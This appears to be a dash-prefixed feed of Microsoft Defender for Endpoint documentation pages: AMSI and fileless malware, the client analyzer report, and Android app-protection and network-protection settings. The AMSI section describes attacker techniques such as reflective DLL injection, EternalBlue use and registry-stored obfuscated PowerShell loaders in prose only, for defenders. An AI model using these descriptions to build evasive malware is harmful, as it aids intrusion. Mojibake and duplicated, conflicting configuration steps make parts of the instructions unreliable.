- Title: "Anti-malware Scan Interface (AMSI) integration with Microsoft Defender Antivirus"
-description: Describes fileless malware and how Microsoft Defender Antivirus uses AMSI to protect against hidden threats.
--- Previously updated : 02/27/2024------
-ai-usage:
-- ai-assisted--
-# Anti-malware Scan Interface (AMSI) integration with Microsoft Defender Antivirus
-
-__Applies to:__
--- Microsoft Defender XDR-- Microsoft Defender Antivirus-- Microsoft Defender for Endpoint P1 & P2-- Microsoft Defender for Business-- Microsoft Defender for Individuals-
-__Platforms:__
--- Windows 10 and newer-- Windows Server 2016 and newer-
-Microsoft Defender for Endpoint utilizes the anti-malware Scan Interface (AMSI) to enhance protection against fileless malware, dynamic script-based attacks, and other nontraditional cyber threats. This article describes the benefits of AMSI integration, the types of scripting languages it supports, and how to enable AMSI for improved security.
-
-## What is Fileless malware?
-
-Fileless malware plays a critical role in modern cyberattacks, using stealthy techniques to avoid detection. Several major ransomware outbreaks used fileless methods as part of their kill chains.
-
-Fileless malware uses existing tools that are already present on a compromised device, such as PowerShell.exe or wmic.exe. Malware can infiltrate a process, executing code within its memory space, and invoking these built-in tools. Attackers significantly reduce their footprint and evade traditional detection mechanisms.
-
-Because memory is volatile, and fileless malware doesn't place files on disk, establishing persistence by using fileless malware can be tricky. One example of how fileless malware achieved persistence was to create a registry run key that launches a ΓÇ£one-linerΓÇ¥ PowerShell cmdlet. This command launched an obfuscated PowerShell script that was stored in the registry BLOB. The obfuscated PowerShell script contained a reflective portable executable (PE) loader that loaded a Base64-encoded PE from the registry. The script stored in the registry ensured the malware persisted.
-
-Attackers use several fileless techniques that can make malware implants stealthy and evasive. These techniques include:
--- **Reflective DLL injection** Reflective DLL injection involves the manual loading of malicious DLLs into a processΓÇÖ memory without the need for said DLLs to be on disk. The malicious DLL can be hosted on a remote attacker-controlled machine and delivered through a staged network channel (for example, Transport Layer Security (TLS) protocol), or embedded in obfuscated form inside infection vectors like macros and scripts. This results in the evasion of the OS mechanism that monitors and keeps track of loading executable modules. An example of malware that uses Reflective DLL injection is HackTool:Win32/Mikatz!dha.--- **Memory exploits** Adversaries use fileless memory exploits to run arbitrary code remotely on victim machines. For example, the UIWIX threat uses the EternalBlue exploit, which was used by both Petya and WannaCry, to install the DoublePulsar backdoor, which lives entirely in the kernelΓÇÖs memory (SMB Dispatch Table). Unlike Petya and Wannacry, UIWIX doesn't drop any files on disk.--- **Script-based techniques** Scripting languages provide powerful means for delivering memory-only executable payloads. Script files can embed encoded shell codes or binaries that they can decrypt on the fly at run time and execute via .NET objects or directly with APIs without requiring them to be written to disk. The scripts themselves can be hidden in the registry, read from network streams, or run manually in the command-line by an attacker, without ever touching the disk.-
-> [!NOTE]
-> Do not disable PowerShell as a means to block fileless malware. PowerShell is a powerful and secure management tool and is important for many system and IT functions. Attackers use malicious PowerShell scripts as post-exploitation technique that can only take place after an initial compromise has already occurred. Its misuse is a symptom of an attack that begins with other malicious actions like software exploitation, social engineering, or credential theft. The key is to prevent an attacker from getting into the position where they can misuse PowerShell.
--- **WMI persistence** Some attackers use the Windows Management Instrumentation (WMI) repository to store malicious scripts that are then invoked periodically using WMI bindings.-
-Microsoft Defender Antivirus blocks most malware using generic, heuristic, and behavior-based detections, as well as local and cloud-based machine learning models. Microsoft Defender Antivirus protects against fileless malware through these capabilities:
--- Detecting script-based techniques by using AMSI, which provides the capability to inspect PowerShell and other script types, even with multiple layers of obfuscation-- Detecting and remediating WMI persistence techniques by scanning the WMI repository, both periodically and whenever anomalous behavior is observed-- Detecting reflective DLL injection through enhanced memory scanning techniques and behavioral monitoring-
-## Why AMSI?
-
-AMSI provides a deeper level of inspection for malicious software that employs obfuscation and evasion techniques on Windows' built-in scripting hosts. By integrating AMSI, Microsoft Defender for Endpoint offers extra layers of protection against advanced threats.
-
-### Supported Scripting Languages
--- PowerShell-- Jscript-- VBScript-- Windows Script Host (wscript.exe and cscript.exe)-- .NET Framework 4.8 or newer (scanning of all assemblies)-- Windows Management Instrumentation (WMI)-
-If you use Microsoft Office 365, AMSI also supports JavaScript, VBA, and XLM.
-
-AMSI doesn't currently support Python or Perl.
-
-### Enabling AMSI
-
-To enable AMSI, you need to enable Script scanning. See [Configure scanning options for Microsoft Defender Antivirus](configure-advanced-scan-types-microsoft-defender-antivirus.md)
-
-Also see [Defender Policy CSP - Windows Client Management](/windows/client-management/mdm/policy-csp-defender)
-
-### AMSI resources
-
-[Anti-malware Scan Interface (AMSI) APIs](/windows/win32/amsi/antimalware-scan-interface-portal) are available for developers and antivirus vendors to implement.
-
-Other Microsoft products such as [Exchange](https://techcommunity.microsoft.com/t5/exchange-team-blog/more-about-amsi-integration-with-exchange-server/ba-p/2572371) and [Sharepoint](https://techcommunity.microsoft.com/t5/microsoft-sharepoint-blog/cyberattack-protection-by-default-and-other-enhancements-to/ba-p/3925641) also use AMSI
-integration.
-
-## More resources to protect against fileless attacks
--- [Windows Defender Application Control and AppLocker](/windows/security/application-security/application-control/windows-defender-application-control/wdac-and-applocker-overview). Enforces strong code Integrity policies and to allow only trusted applications to run. In the context of fileless malware, WDAC locks down PowerShell to Constrained Language Mode, which limits the extended language features that can lead to unverifiable code execution, such as direct .NET scripting, invocation of Win32 APIs via the Add-Type cmdlet, and interaction with COM objects. This essentially mitigates PowerShell-based reflective DLL injection attacks.--- [Attack surface reduction](overview-attack-surface-reduction.md) helps admins protect against common attack vectors.--- [Enable virtualization-based protection of code integrity](/windows/security/hardware-security/enable-virtualization-based-protection-of-code-integrity). Mitigates kernel-memory exploits through Hypervisor Code Integrity (HVCI), which makes it difficult to inject malicious code using kernel-mode software vulnerabilities.
security Analyzer Feedback https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/analyzer-feedback.md
- Title: Provide feedback on the Microsoft Defender for Endpoint Client Analyzer tool
-description: Provide feedback on the Microsoft Defender for Endpoint client analyzer tool
--- NOCSH------ m365-security-- tier2-- Previously updated : 02/15/2024--
-# Provide feedback on the Microsoft Defender for Endpoint client analyzer tool
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-If you have feedback or suggestions that would help us improve the Microsoft Defender for Endpoint client analyzer, use either of these options to submit feedback:
-
-1. Microsoft Defender portal (security.microsoft.com):
--
-2. Microsoft Defender portal (security.microsoft.com):
-
security Analyzer Report https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/analyzer-report.md
- Title: Understand the client analyzer HTML report
-description: Learn how to analyze the Microsoft Defender for Endpoint Client Analyzer HTML report
--- NOCSH------ m365-security-- tier3-- Previously updated : 02/15/2024--
-# Understand the client analyzer HTML report
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-The client analyzer produces a report in HTML format. Learn how to review the report to identify potential sensor issues so that you can troubleshoot them.
-
-Use the following example to understand the report.
-
- Example output from the analyzer on a machine onboarded to expired Org ID and failing to reach one of the required Microsoft Defender for Endpoint URLs:
---- On top, the script version and script runtime are listed for reference-- The **Device Information** section provides basic OS and device identifiers to uniquely identify the device on which the analyzer has run.-- The **Endpoint Security Details** provides general information about Microsoft Defender for Endpoint-related processes including Microsoft Defender Antivirus and the sensor process. If important processes aren't online as expected, the color will change to red.-
- :::image type="content" source="media/85f56004dc6bd1679c3d2c063e36cb80.png" alt-text="The Check Results Summary page" lightbox="media/85f56004dc6bd1679c3d2c063e36cb80.png":::
--- On **Check Results Summary**, you'll have an aggregated count for error,
- warning, or informational events detected by the analyzer.
-- On **Detailed Results**, you'll see a list (sorted by severity) with
- the results and the guidance based on the observations made by the analyzer.
-
-## Open a support ticket to Microsoft and include the Analyzer results
-
-To include analyzer result files [when opening a support ticket](contact-support.md#open-a-service-request), make sure you use the **Attachments** section and include the
-`MDEClientAnalyzerResult.zip` file:
--
-> [!NOTE]
-> If the file size is larger than 25 MB, the support engineer assigned to your case will provide a dedicated secure workspace to upload large files for analysis.
security Android Configure Mam https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-configure-mam.md
- Title: Configure Microsoft Defender for Endpoint on Android risk signals using App Protection Policies (MAM)
-description: Describes how to configure Microsoft Defender for Endpoint risk signals using App Protection policies
------- m365-security-- tier3-- mde-android-- Previously updated : 01/13/2023--
-# Configure Microsoft Defender for Endpoint on Android risk signals using App Protection Policies (MAM)
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Microsoft Defender for Endpoint on Android, which already protects enterprise users on Mobile Device Management (MDM) scenarios, now extends support to Mobile App Management (MAM), for devices that aren't enrolled using Intune mobile device management (MDM). It also extends this support to customers who use other enterprise mobility management solutions, while still using Intune for mobile application management (MAM). This capability allows you to manage and protect your organization's data within an application.
-
-Microsoft Defender for Endpoint on Android threat information is applied by Intune App Protection Policies to protect these apps. App protection policies (APP) are rules that ensure an organization's data remains safe or contained in a managed app. A managed application has app protection policies applied to it and can be managed by Intune.
-
-Microsoft Defender for Endpoint on Android supports both the configurations of MAM.
--- **Intune MDM + MAM**: IT administrators can only manage apps using App Protection Policies on devices that are enrolled with Intune mobile device management (MDM).-- **MAM without device enrollment**: MAM without device enrollment, or MAM-WE, allows IT administrators to manage apps using [App Protection Policies](/mem/intune/apps/app-protection-policy) on devices not enrolled with Intune MDM. This provision means that apps can be managed by Intune on devices enrolled with third-party EMM providers.
-To manage apps in both these configurations customers should use Intune in the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431).
-
-To enable this capability an administrator needs to configure the connection between Microsoft Defender for Endpoint and Intune, create the app protection policy, and apply the policy on targeted devices and applications.
-
-End users also need to take steps to install Microsoft Defender for Endpoint on their device and activate the onboarding flow.
-
-## Admin prerequisites
--- **Validate that the Microsoft Defender for Endpoint-Intune connector is enabled**.-
- a. Go to security.microsoft.com.
-
- b. Select **Settings > Endpoints > Advanced Features > Microsoft Intune Connection** is turned on.
-
- c. If the connection isn't turned on, select the toggle to turn it on and then select **Save Preferences**.
-
- :::image type="content" source="media/enable-intune-connection.png" alt-text="The Advanced features section in the Microsoft Defender portal." lightbox="media/enable-intune-connection.png":::
-
- d. Go to the **Microsoft Intune admin center** and Validate whether Microsoft Defender for Endpoint-Intune connector is enabled.
-
- :::image type="content" source="media/validate-intune-connector.png" alt-text="The intune-connector status pane in the Microsoft Defender portal." lightbox="media/validate-intune-connector.png":::
--- **Enable Microsoft Defender for Endpoint on Android Connector for App Protection Policy (APP)**.-
- Configure the connector on Microsoft Intune for App protection policies:
-
- a. Go to **Tenant Administration > Connectors and Tokens > Microsoft Defender for Endpoint**.
-
- b. Turn on the toggle for the app protection policy for Android (as seen in the following screenshot).
-
- c. Select **Save**.
-
- :::image type="content" source="media/app-settings.png" alt-text="The application settings pane in the Microsoft Defender portal." lightbox="media/app-settings.png":::
--- **Create an app protection policy**.-
- Block access or wipe data of a managed app based on Microsoft Defender for Endpoint risk signals by creating an app protection policy.
-
- Microsoft Defender for Endpoint can be configured to send threat signals to be used in app protection policies (APP, also known as MAM). With this capability, you can use Microsoft Defender for Endpoint to protect managed apps.
-
- 1. Create a policy.
-
- App protection policies (APP) are rules that ensure an organization's data remains safe or contained in a managed app. A policy can be a rule that is enforced when the user attempts to access or move "corporate" data, or a set of actions that are prohibited or monitored when the user is inside the app.
-
- :::image type="content" source="media/create-policy.png" alt-text="The Create policy tab in the App protection policies page in the Microsoft Defender portal." lightbox="media/create-policy.png":::
-
- 2. Add apps.
-
- a. Choose how you want to apply this policy to apps on different devices. Then add at least one app.
-
- Use this option to specify whether this policy applies to unmanaged devices. In Android, you can specify the policy applies to Android Enterprise, Device Admin, or Unmanaged devices. You can also choose to target your policy to apps on devices of any management state.
-
- Because mobile app management doesn't require device management, you can protect company data on both managed and unmanaged devices. The management is centered on the user identity, which removes the requirement for device management. Companies can use app protection policies with or without MDM at the same time. For example, consider an employee that uses both a phone issued by the company, and their own personal tablet. The company phone is enrolled in MDM and protected by app protection policies while the personal device is protected by app protection policies only.
-
- b. Select Apps.
-
- A managed app is an app that has app protection policies applied to it, and can be managed by Intune. Any app that has been integrated with the [Intune SDK](/mem/intune/developer/app-sdk) or wrapped by the [Intune App Wrapping Tool](/mem/intune/developer/apps-prepare-mobile-application-management) can be managed using Intune app protection Policies. See the official list of [Microsoft Intune protected apps](/mem/intune/apps/apps-supported-intune-apps) that have been built using these tools and are available for public use.
-
- *Example: Outlook as a managed app*
-
- :::image type="content" source="media/managed-app.png" alt-text="The Public apps pane in the Microsoft Defender portal." lightbox="media/managed-app.png":::
-
- 3. Set sign-in security requirements for your protection policy.
-
- Select **Setting > Max allowed device threat level** in **Device Conditions** and enter a value. Then select **Action: "Block Access"**. Microsoft Defender for Endpoint on Android shares this Device Threat Level.
--
- :::image type="content" source="media/conditional-launch.png" alt-text="The Device conditions pane in the Microsoft Defender portal" lightbox="media/conditional-launch.png":::
--- **Assign user groups for whom the policy needs to be applied.**-
- Select **Included groups**. Then add the relevant groups.
-
- :::image type="content" source="media/assignment.png" alt-text="The Included groups pane in the Microsoft Defender portal." lightbox="media/assignment.png":::
->[!NOTE]
->If a config policy is to be targeted at unenrolled devices (MAM), the recommendation is to deploy the general app configuration settings in Managed Apps instead of using Managed Devices.
->When deploying app configuration policies to devices, issues can occur when multiple policies have different values for the same configuration key and are targeted for the same app and user. These issues are due to the lack of a conflict resolution mechanism for resolving the differing values. You can prevent these issues by ensuring that only a single app configuration policy for devices is defined and targeted for the same app and user.
--
-## End-user prerequisites
--- The broker app must be installed.
- - Intune Company Portal
--- Users have the required licenses for the managed app and have the app installed.-
-### End-user onboarding
-
-1. Sign in to a managed application, for example, Outlook. The device is registered and the application protection policy is synchronized to the device. The application protection policy recognizes the device's health state.
-
-2. Select **Continue**. A screen is presented which recommends downloading and setting up of Microsoft Defender for Endpoint on Android app.
-
-3. Select **Download**. You'll be redirected to the app store (Google play).
-
-4. Install the Microsoft Defender for Endpoint (Mobile) app and launch back Managed app onboarding screen.
-
- :::image type="content" source="medie.png":::
-
-5. Click **Continue > Launch**. The Microsoft Defender for Endpoint app onboarding/activation flow is initiated. Follow the steps to complete onboarding. You'll automatically be redirected back to Managed app onboarding screen, which now indicates that the device is healthy.
-
-6. Select **Continue** to log into the managed application.
-
-## Configure Web protection
-
-Defender for Endpoint on Android allows IT Administrators to configure web protection. Web protection is available within the [Microsoft Intune admin center](https://endpoint.microsoft.com).
-
-Web protection helps to secure devices against web threats and protect users from phishing attacks. Note that anti-phishing and custom indicators (URL and IP addresses) are supported as part of web protection. Web content filtering is currently not supported on mobile platforms.
-
-1. In the Microsoft Intune admin center, go to **Apps > App configuration policies > Add > Managed apps**.
-
-2. Give the policy a **name**.
-
-3. Under **Select Public Apps**, choose **Microsoft Defender for Endpoint** as the target app.
-
-4. In the **Settings** page, under the **General Configuration Settings**, add the following keys and set their value as required.
- - **antiphishing**
- - **vpn**
-
- To disable web protection, enter 0 for the antiphishing and VPN values.
-
- To disable only the use of VPN by web protection, enter these values:
- - 0 for vpn
- - 1 for antiphishing
-
- Add **DefenderMAMConfigs** key and set the value as 1.
-
-5. Assign this policy to users. By default, this value is set to false.
-
-6. Review and create the policy.
-
-## Configure Network Protection
-
-1. In Microsoft Intune admin center, navigate to **Apps** \> **App configuration policies**. Create a new App configuration policy. Click Managed Apps.
-
-2. Provide a name and description to uniquely identify the policy. Target the policy to **'Selected apps'** and search for **'Microsoft Defender Endpoint for Android'**. Click the entry and then click **Select** and then **Next**.
-
-1. Add the key and value from the following table. Ensure that the **"DefenderMAMConfigs"** key is present in every policy that you create using Managed Apps route. For Managed Devices route, this key shouldn't exist. When you're done, click **Next**.
-
- | Key | Value Type | Default (true-enable, false-disable) | Description |
- | | | | |
- | `DefenderNetworkProtectionEnable` | Integer | 0 | 1 - Enable, 0 - Disable; This setting is used by IT admins to enable or disable the network protection capabilities in the defender app.|
- |`DefenderAllowlistedCACertificates`| String | None | None-Disable; This setting is used by IT admins to establish trust for root CA and self-signed certificates.|
- |`DefenderCertificateDetection`|Integer| 0 |2-Enable, 1 - Audit mode, 0 - Disable; When this feature is enabled with value as 2, end user notifications are sent to the user when Defender detects a bad certificate. Alerts are also sent to SOC Admins. In audit mode (1), notification alerts are sent to SOC admins, but no end user notifications are displayed to the user when Defender detects a bad certificate. Admins can disable this detection with 0 as the value and enable full feature functionality by setting 2 as the value. |
- | `DefenderOpenNetworkDetection` | Integer | 0 |2-Enable, 1 - Audit mode, 0 - Disable; This setting is used by IT Admins to enable or disable open network detection. By default, the open network detection is disabled with value as 0 and defender does not send end user notifications or alerts to SOC admins in security portal. If switched to audit mode with value 1, notification alert is sent to SOC admin, but no end user notification is displayed to the user when defender detects an open network. If it's enabled with value 2, then end user notification is displayed and also alerts to SOC admins is sent.|
- | `DefenderEndUserTrustFlowEnable` | Integer | 0 | 1 - Enable, 0 - Disable; This setting is used by IT admins to enable or disable the end user in-app experience to trust and untrust the unsecure and suspicious networks. |
- | `DefenderNetworkProtectionAutoRemediation` | Integer | 1 | 1 - Enable, 0 - Disable; This setting is used by IT admins to enable or disable the remediation alerts that are sent when a user performs remediation activities like switching to safer Wi-Fi access points or deleting suspicious certificates detected by Defender. |
- | `DefenderNetworkProtectionPrivacy` | Integer | 1 | 1 - Enable, 0 - Disable; This setting is used by IT admins to enable or disable privacy in network protection. If privacy is disabled with value 0, then user consent is shown to share the malicious wifi or certs data. If its in enabled state with value 1, then no user consent is shown and no app data is collected.|
-
-4. Include or exclude the groups you want the policy to apply to. Proceed to review and submit the policy.
-
-> [!NOTE]
-> Users need to enable location permission (which is an optional permission); this enables Defender for Endpoint to scan their networks and alert them when there are WiFi-related threats. If the location permission is denied by the user, Defender for Endpoint will only be able to provide limited protection against network threats and will only protect the users from rogue certificates.
-
-## Configure privacy controls
-
-Admins can use the following steps to enable privacy and not collect the domain name, app details and network information as part of the alert report for corresponding threats.
-
-1. In Microsoft Intune admin center, go to **Apps > App configuration policies > Add > Managed apps**.
-
-1. Give the policy a **name**.
-
-1. Under the Select Public Apps, choose **Microsoft Defender for Endpoint** as the target app.
-4. On the Settings page, under General Configuration Settings, add **DefenderExcludeURLInReport** and **DefenderExcludeAppInReport** as the keys and value as 1.
-
-1. Add **DefenderMAMConfigs** key and set the value as 1.
-
-5. Assign this policy to users. By default, this value is set to 0.
-
-1. In Settings page, under the General Configuration Settings add **DefenderExcludeURLInReport**, **DefenderExcludeAppInReport** as the keys and value as true.
-
-1. Add **DefenderMAMConfigs** key and set the value as 1.
-
-1. Assign this policy to users. By default, this value is set to false.
--
-1. Review and create the policy.
-
-## Optional permissions
-
-Microsoft Defender for Endpoint on Android enables Optional Permissions in the onboarding flow. Currently the permissions required by MDE are mandatory in the onboarding flow. With this feature, admin can deploy MDE on Android devices with MAM policies without enforcing the mandatory VPN and Accessibility Permissions during onboarding. End Users can onboard the app without the mandatory permissions and can later review these permissions.
-
-### Configure optional permission
-
-Use the following steps to enable Optional permissions for devices.
-
-1. In Microsoft Intune admin center, go to **Apps > App configuration policies > Add > Managed apps**.
-
-1. Give the policy a **name**.
-
-1. Select **Microsoft Defender for Endpoint** in public apps.
--
-4. On the Settings page, select **Use configuration designer** and **DefenderOptionalVPN** or **DefenderOptionalAccessibility** or **both** as the key.
-
-1. Add **DefenderMAMConfigs** key and set the value as 1.
-
-5. To enable Optional permissions, enter the value as **1** and assign this policy to users. By default, this value is set to 0.
-For users with key set as 1, they will be able to onboard the app without giving these permissions.
-
-1. In Settings page, select **Use configuration designer** and **DefenderOptionalVPN** or **DefenderOptionalAccessibility** or **both** as the key and value type as Boolean.
-
-1. Add **DefenderMAMConfigs** key and set the value as 1.
-
-1. To enable Optional permissions, enter value as **true** and assign this policy to users. By default, this value is set to false.
-For users with key set as true, the users are able to onboard the app without giving these permissions.
--
-1. Select **Next** and assign this profile to targeted devices/users.
-
-### User flow
-
-Users can install and open the app to start the onboarding process.
-
-1. If an admin has setup Optional permissions, then users can choose to skip the VPN or accessibility permission or both and complete onboarding.
-
-2. Even if the user has skipped these permissions, the device is able to onboard, and a heartbeat will be sent.
-
-3. Since permissions are disabled, Web protection won't be active. It will be partially active if one of the permissions is given.
-
-4. Later, users can enable Web protection from within the app. This will install the VPN configuration on the device.
-
-> [!NOTE]
-> The Optional permissions setting is different from the Disable Web protection setting. Optional permissions only help to skip the permissions during onboarding but it's available for the end user to later review and enable while Disable Web protection allows users to onboard the Microsoft Defender for Endpoint app without the Web Protection. It cannot be enabled later.
--
-## Disable sign out
-Defender for Endpoint allows you to deploy the app and disabling the sign out button. By hiding the sign out button, users are prevented from signing out of the Defender app. This action helps prevent tampering with the device when Defender for Endpoint isn't running.
-
-Use the following steps to configure the Disable sign out:
-
-1. In the Microsoft Intune admin center, go to **Apps > App configuration policies > Add > Managed apps**.
-2. Provide the policy a **name**.
-3. Under **Select Public Apps**, choose **Microsoft Defender for Endpoint** as the target app.
-4. In the **Settings** page, under the **General Configuration Settings**, add **DisableSignOut** as the key and set the value as 1.
- - By default, Disable Sign Out = 0.
- - Admin needs to make Disable Sign Out = 1 to disable the sign-out button in the app. Users will not see the sign out button once the policy is pushed to the device.
-5. Select **Next** and assign this profile to targeted devices and users.
-
-> [!IMPORTANT]
-> This feature is in Public Preview. The following information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-## Device Tagging
-
-Defender for Endpoint on Android enables bulk tagging the mobile devices during onboarding by allowing the admins to set up tags via Intune. Admin can configure the device tags through Intune via configuration policies and push them to user's devices. Once the User installs and activates Defender, the client app passes the device tags to the Security Portal. The Device tags appear against the devices in the Device Inventory.
-
-Use the following steps to configure the Device tags:
-
-1. In the Microsoft Intune admin center, go to **Apps > App configuration policies > Add > Managed apps**.
-2. Provide the policy a **name**.
-3. Under **Select Public Apps**, choose **Microsoft Defender for Endpoint** as the target app.
-4. In Settings page, select Use configuration designer and add **DefenderDeviceTag** as the key and value type as **String**.
- - Admin can assign a new tag by adding the key **DefenderDeviceTag** and setting a value for device tag.
- - Admin can edit an existing tag by modifying the value of the key **DefenderDeviceTag**.
- - Admin can delete an existing tag by removing the key **DefenderDeviceTag**.
-
-5. Click Next and assign this policy to targeted devices and users.
--
-> [!NOTE]
-> The Defender app needs to be opened for tags to be synced with Intune and passed to Security Portal. It may take up to 18 hours for tags to reflect in the portal.
-
-## Related topics
--- [Overview of Microsoft Defender for Endpoint on Android](microsoft-defender-endpoint-android.md)--- [Deploy Microsoft Defender for Endpoint on Android with Microsoft Intune](android-intune.md)--
security Android Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-configure.md
- Title: Configure Microsoft Defender for Endpoint on Android features
-description: Describes how to configure Microsoft Defender for Endpoint on Android
------- m365-security-- tier3-- mde-android-- Previously updated : 12/18/2020--
-# Configure Defender for Endpoint on Android features
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-## Conditional Access with Defender for Endpoint on Android
-
-Microsoft Defender for Endpoint on Android, along with Microsoft Intune and Microsoft Entra ID, enables enforcing Device compliance and Conditional Access policies based on device risk levels. Defender for Endpoint is a Mobile Threat Defense (MTD) solution that you can deploy through Intune.
-
-For more information about how to set up Defender for Endpoint on Android and Conditional Access, see [Defender for Endpoint and Intune](/mem/intune/protect/advanced-threat-protection).
-
-## Configure custom indicators
-
-> [!NOTE]
-> Defender for Endpoint on Android only supports creating custom indicators for IP addresses and URLs/domains.
-
-Defender for Endpoint on Android enables admins to configure custom indicators to support Android devices as well. For more information on how to configure custom indicators, see [Manage indicators](manage-indicators.md).
-
-## Configure web protection
-
-Defender for Endpoint on Android allows IT Administrators the ability to configure the web protection feature. This capability is available within the Microsoft Intune admin center.
-
-[Web protection](web-protection-overview.md) helps to secure devices against web threats and protect users from phishing attacks. Anti-phishing and custom indicators (URL and IP addresses) are supported as part of web protection. Web content filtering is currently not supported on mobile platforms.
-
-> [!NOTE]
-> Defender for Endpoint on Android would use a VPN in order to provide the Web Protection feature. This VPN is not a regular VPN. Instead, it's a local/self-looping VPN that does not take traffic outside the device.
->
-> For more information, see [Configure web protection on devices that run Android](/mem/intune/protect/advanced-threat-protection-manage-android).
-
-## Network Protection
-
-This feature provides protection against rogue Wi-Fi related threats and rogue certificates, which are the primary attack vector for Wi-Fi networks. Admins can list the root Certificate Authority (CA) and private root CA certificates in Microsoft Intune admin center and establish trust with endpoints. It provides the user a guided experience to connect to secure networks and also notifies them if a related threat is detected.
-
-It includes several admin controls to offer flexibility, such as the ability to configure the feature from within the Microsoft Intune admin center and add trusted certificates. Admins can enable [privacy controls](/microsoft-365/security/defender-endpoint/android-configure#privacy-controls) to configure the data sent to Defender for Endpoint from Android devices.
-
-Network protection in Microsoft Defender for endpoint is disabled by default. Admins can use the following steps to **configure Network protection in Android devices.**
-
-1. In the Microsoft Intune admin center, navigate to Apps > App configuration policies. Create a new App configuration policy.
-
- > [!div class="mx-imgBorder"]
- > ![Image of how to create a policy.](media/android-mem.png)
-
-1. Provide a name and description to uniquely identify the policy. Select **'Android Enterprise'** as the platform and **'Personally-owned work profile only'** as the profile type and **'Microsoft Defender'** as the Targeted app.
-
- > [!div class="mx-imgBorder"]
- > ![Image of policy details.](media/appconfigdetails.png)
-
-1. In Settings page, select **'Use configuration designer'** and add **'Enable Network Protection in Microsoft Defender'** as the key and value as **'1'** to enable Network Protection. (Network protection is disabled by default)
-
- > [!div class="mx-imgBorder"]
- > ![Image of how to select enable network protection policy](media/selectnp.png)
-
- > [!div class="mx-imgBorder"]
- > ![Image of add configuration policy.](media/npvalue.png)
-
-1. If your organization uses root CAs that are private, you must establish explicit trust between Intune (MDM solution) and user devices. Establishing trust helps prevent Defender from flagging root CAs as rogue certificates.
-
- To establish trust for the root CAs, use **'Trusted CA certificate list for Network Protection'** as the key. In the value, add the **'comma separated list of certificate thumbprints (SHA 1)'**.
-
- **Example of Thumbprint format to add**: `50 30 06 09 1d 97 d4 f5 ae 39 f7 cb e7 92 7d 7d 65 2d 34 31, 503006091d97d4f5ae39f7cbe7927d7d652d3431`
-
- > [!IMPORTANT]
- > Certificate SHA-1 Thumbprint characters should be with either white space separated, or non separated.
- >
- > This format is invalid: `50:30:06:09:1d:97:d4:f5:ae:39:f7:cb:e7:92:7d:7d:65:2d:34:31`
-
- Any other separation characters are invalid.
-
- > ![Image of trusted CA certificate.](media/trustca.png)
-
-1. For other configurations related to Network protection, add the following keys and appropriate corresponding value.
-
- | Configuration Key| Description|
- |||
- |Trusted CA certificate list for Network Protection|Security admins manage this setting to establish trust for root CA and self-signed certificates.|
- |Enable Network protection in Microsoft Defender|1 - Enable, 0- Disable (default). This setting is used by the IT admin to enable or disable the network protection capabilities in the Defender app.|
- |Enable Network Protection Privacy|1 - Enable (default), 0 - Disable. Security admins manage this setting to enable or disable privacy in network protection.|
- |Enable Users to Trust Networks and Certificates|1 - Enable, 0 - Disable (default). Security admins manage this setting to enable or disable the end user's in-app experience to trust and untrust unsecure and suspicious networks and malicious certificates.|
- |Automatic Remediation of Network Protection Alerts|1 - Enable (default), 0 - Disable. Security admins manage this setting to enable or disable the remediation alerts that are sent when a user performs remediation activities, such as switching to a safer Wi-Fi access point or deleting suspicious certificates detected by Defender.|
- |Manage Network Protection detection for Open Networks|0 - Disable (default), 1 - Audit Mode, 2 - Enable. Security admins manage this setting to disable, audit, or enable open network detection, respectively. In 'Audit' mode, alerts are sent only to the ATP portal with no end user experience. For user experience, set the config to 'Enable' mode.|
- |Manage Network protection Detection for Certificates|0 - Disable, 1 - Audit mode (default), 2 - Enable. When network protection is enabled, Audit mode for certificate detection is enabled by default. In Audit mode, notification alerts are sent to SOC admins, but no end-user notifications are displayed to the user when Defender detects a bad certificate. Admins can, however, disable this detection with 0 as the value and enable full feature functionality by setting 2 as the value. When the feature is enabled with the value of 2, end-user notifications are sent to the user when Defender detects a bad certificate, and alerts are also sent to the SOC Admin.|
-
-6. Add the required groups to which the policy will have to be applied. Review and create the policy.
-
- | Configuration Key| Description|
- |||
- |Enable Network protection in Microsoft Defender|1: Enable <br/> 0: Disable (default) <br/><br/> This setting is used by the IT admin to enable or disable the network protection capabilities in the Defender app.|
- |Enable Network Protection Privacy|1: Enable (default) <br/> 0: Disable <br/><br/> Security admins manage this setting to enable or disable privacy in network protection.|
- |Enable Users to Trust Networks and Certificates|1 <br/> Enable <br/> 0:Disable (default) <br/><br/> This setting is used by IT admins to enable or disable the end user in-app experience to trust and untrust the unsecure and suspicious networks and malicious certificates.|
- |Automatic Remediation of Network Protection Alerts|1: Enable (default) <br/> 0: Disable <br/><br/> This setting is used by IT admins to enable or disable the remediation alerts that are sent when a user does remediation activities. For example, the user switches to a safer Wi-Fi access point or deletes suspicious certificates that were detected by Defender.|
- |Manage Network Protection detection for Open Networks|0: Disable (default) <br/> 1: Audit Mode <br/><br/> Security admins manage this setting to enable or disable open network detection.|
